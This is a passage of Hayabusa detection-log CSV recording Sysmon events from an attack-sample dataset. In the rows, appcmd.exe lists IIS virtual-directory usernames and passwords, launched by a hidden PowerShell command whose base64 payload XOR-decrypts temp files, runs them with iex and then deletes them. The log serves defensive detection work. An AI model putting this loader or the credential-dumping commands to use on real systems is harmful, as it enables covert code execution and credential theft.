IAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3848 | PGUID: 365ABB72-3D6F-5CEB-0000-0010B2D3FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.964 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3640 | PGUID: 365ABB72-3D6F-5CEB-0000-001072D7FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:20.034 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1900 | PGUID: 365ABB72-3D6F-5CEB-0000-001032DBFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:20.124 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2772 | PGUID: 365ABB72-3D70-5CEB-0000-0010F2DEFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:20.204 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2108 | PGUID: 365ABB72-3D70-5CEB-0000-0010B2E2FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:20.305 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2640 | PGUID: 365ABB72-3D70-5CEB-0000-001072E6FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:20.435 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 